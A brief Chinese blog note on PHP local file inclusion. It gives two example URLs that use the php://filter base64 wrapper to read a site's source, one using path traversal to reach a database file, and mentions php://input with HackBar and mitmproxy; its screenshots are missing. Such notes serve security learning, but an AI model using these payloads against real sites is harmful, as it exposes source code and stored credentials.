`

PHP LFI

    博客分类:
  • web
 
阅读更多
1. LFI
http://www.example.com/index.php?m=php://filter/convert.base64-encode/resource=index
http://www.example.com/index.php?m=php://filter/read=convert.base64-encode/resource=../sqli/db.php

2. php://input可以等效于post数据
使用hackbar插件提交数据


然后使用mitmporxy抓包


参考:http://www.freebuf.com/articles/web/14097.html
https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
  • 大小: 27.2 KB
  • 大小: 50 KB
分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics